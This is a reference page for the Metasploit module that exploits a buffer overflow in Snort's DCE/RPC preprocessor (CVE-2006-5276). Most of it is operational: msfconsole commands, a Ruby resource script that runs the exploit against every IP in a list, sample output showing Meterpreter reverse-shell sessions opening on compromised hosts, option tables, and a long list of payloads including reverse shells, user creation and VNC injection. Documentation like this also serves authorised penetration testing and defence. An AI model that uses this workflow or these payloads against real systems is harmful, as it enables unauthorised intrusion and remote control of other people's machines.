Snort 2 DCE/RPC Preprocessor Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/multi/ids/snort_dce_rpc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Snort 2 DCE/RPC Preprocessor Buffer Overflow
Module: exploit/multi/ids/snort_dce_rpc
Source code: modules/exploits/multi/ids/snort_dce_rpc.rb
Disclosure date: 2007-02-19
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux, Windows
Target service / protocol: -
Target network port(s): 139
List of CVEs: CVE-2006-5276

This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.

Module Ranking and Traits

Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.

Basic Usage

Using snort_dce_rpc against a single host

Normally, you can use exploit/multi/ids/snort_dce_rpc this way:

msf > use exploit/multi/ids/snort_dce_rpc
msf exploit(snort_dce_rpc) > show targets
    ... a list of targets ...
msf exploit(snort_dce_rpc) > set TARGET target-id
msf exploit(snort_dce_rpc) > show options
    ... show and set options ...
msf exploit(snort_dce_rpc) > exploit

Using snort_dce_rpc against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your snort_dce_rpc will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/ids/snort_dce_rpc")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • RHOST: A host on the Snort-monitored network

Go back to menu.

Msfconsole Usage

Here is how the multi/ids/snort_dce_rpc exploit module looks in the msfconsole:

msf6 > use exploit/multi/ids/snort_dce_rpc

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/ids/snort_dce_rpc) > show info

       Name: Snort 2 DCE/RPC Preprocessor Buffer Overflow
     Module: exploit/multi/ids/snort_dce_rpc
   Platform: Windows, Linux
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2007-02-19

Provided by:
  Neel Mehta
  Trirat Puttaraksa
  Carsten Maartmann-Moe <[email protected]>
  0a29406d9794e4f9b30b3c5d6702c708

Available targets:
  Id  Name
  --  ----
  0   Windows Universal
  1   Redhat 8

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  INTERFACE                   no        The name of the interface
  RHOST                       yes       A host on the Snort-monitored network
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      139              yes       The target port (TCP)
  SHOST                       no        The (potentially spoofed) source address

Payload information:
  Space: 390
  Avoid: 1 characters

Description:
  This module allows remote attackers to execute arbitrary code by 
  exploiting the Snort service via crafted SMB traffic. The 
  vulnerability is due to a boundary error within the DCE/RPC 
  preprocessor when reassembling SMB Write AndX requests, which may 
  result a stack-based buffer overflow with a specially crafted packet 
  sent on a network that is monitored by Snort. Vulnerable versions 
  include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. 
  Any host on the Snort network may be used as the remote host. The 
  remote host does not need to be running the SMB service for the 
  exploit to be successful.

References:
  OSVDB (32094)
  https://nvd.nist.gov/vuln/detail/CVE-2006-5276
  http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html
  http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html
  http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py

Module Options

This is a complete list of options available in the multi/ids/snort_dce_rpc exploit:

msf6 exploit(multi/ids/snort_dce_rpc) > show options

Module options (exploit/multi/ids/snort_dce_rpc):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOST                       yes       A host on the Snort-monitored network
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      139              yes       The target port (TCP)
   SHOST                       no        The (potentially spoofed) source address

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

Advanced Options

Here is a complete list of advanced options supported by the multi/ids/snort_dce_rpc exploit:

msf6 exploit(multi/ids/snort_dce_rpc) > show advanced

Module advanced options (exploit/multi/ids/snort_dce_rpc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   GATEWAY_PROBE_HOST      8.8.8.8          yes       Send a TTL=1 random UDP datagram to this host to discover the default gateway's MAC
   GATEWAY_PROBE_PORT                       no        The port on GATEWAY_PROBE_HOST to send a random UDP probe to (random if 0 or unset)
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SECRET                  1297303073       yes       A 32-bit cookie for probe requests.
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the multi/ids/snort_dce_rpc module can exploit:

msf6 exploit(multi/ids/snort_dce_rpc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Redhat 8

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the multi/ids/snort_dce_rpc exploit:

msf6 exploit(multi/ids/snort_dce_rpc) > show payloads

Compatible Payloads
===================

   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    payload/generic/custom                                                       normal  No     Custom Payload
   1    payload/generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    payload/generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    payload/generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    payload/generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
   5    payload/windows/adduser                                                      normal  No     Windows Execute net user /ADD
   6    payload/windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   7    payload/windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   8    payload/windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   9    payload/windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   10   payload/windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   11   payload/windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   12   payload/windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   13   payload/windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   14   payload/windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   15   payload/windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   16   payload/windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   17   payload/windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   18   payload/windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   19   payload/windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   20   payload/windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   21   payload/windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   22   payload/windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   23   payload/windows/exec                                                         normal  No     Windows Execute Command
   24   payload/windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   25   payload/windows/messagebox                                                   normal  No     Windows MessageBox
   26   payload/windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   27   payload/windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   28   payload/windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   29   payload/windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   30   payload/windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   31   payload/windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   32   payload/windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   33   payload/windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   34   payload/windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   35   payload/windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   36   payload/windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   37   payload/windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   38   payload/windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   39   payload/windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   40   payload/windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   41   payload/windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   42   payload/windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   43   payload/windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   44   payload/windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   45   payload/windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   46   payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   47   payload/windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   48   payload/windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   49   payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   50   payload/windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   51   payload/windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   52   payload/windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   53   payload/windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   54   payload/windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   55   payload/windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   56   payload/windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   57   payload/windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   58   payload/windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   59   payload/windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   60   payload/windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   61   payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   62   payload/windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   63   payload/windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   64   payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   65   payload/windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   66   payload/windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   67   payload/windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   68   payload/windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   69   payload/windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   70   payload/windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   71   payload/windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   72   payload/windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   73   payload/windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   74   payload/windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   75   payload/windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   76   payload/windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   77   payload/windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   78   payload/windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   79   payload/windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   80   payload/windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   81   payload/windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   82   payload/windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   83   payload/windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   84   payload/windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   85   payload/windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   86   payload/windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   87   payload/windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   88   payload/windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   89   payload/windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   90   payload/windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   91   payload/windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   92   payload/windows/pingback_bind_tcp                                            normal  No     Windows x86 Pingback, Bind TCP Inline
   93   payload/windows/pingback_reverse_tcp                                         normal  No     Windows x86 Pingback, Reverse TCP Inline
   94   payload/windows/powershell_bind_tcp                                          normal  No     Windows Interactive Powershell Session, Bind TCP
   95   payload/windows/powershell_reverse_tcp                                       normal  No     Windows Interactive Powershell Session, Reverse TCP
   96   payload/windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   97   payload/windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   98   payload/windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   99   payload/windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   100  payload/windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   101  payload/windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   102  payload/windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   103  payload/windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   104  payload/windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   105  payload/windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   106  payload/windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   107  payload/windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   108  payload/windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   109  payload/windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   110  payload/windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   111  payload/windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   112  payload/windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   113  payload/windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   114  payload/windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   115  payload/windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   116  payload/windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   117  payload/windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   118  payload/windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   119  payload/windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   120  payload/windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   121  payload/windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   122  payload/windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   123  payload/windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   124  payload/windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   125  payload/windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   126  payload/windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   127  payload/windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
   128  payload/windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   129  payload/windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   130  payload/windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   131  payload/windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   132  payload/windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   133  payload/windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   134  payload/windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   135  payload/windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   136  payload/windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   137  payload/windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   138  payload/windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   139  payload/windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   140  payload/windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   141  payload/windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   142  payload/windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   143  payload/windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   144  payload/windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   145  payload/windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   146  payload/windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   147  payload/windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support

Evasion Options

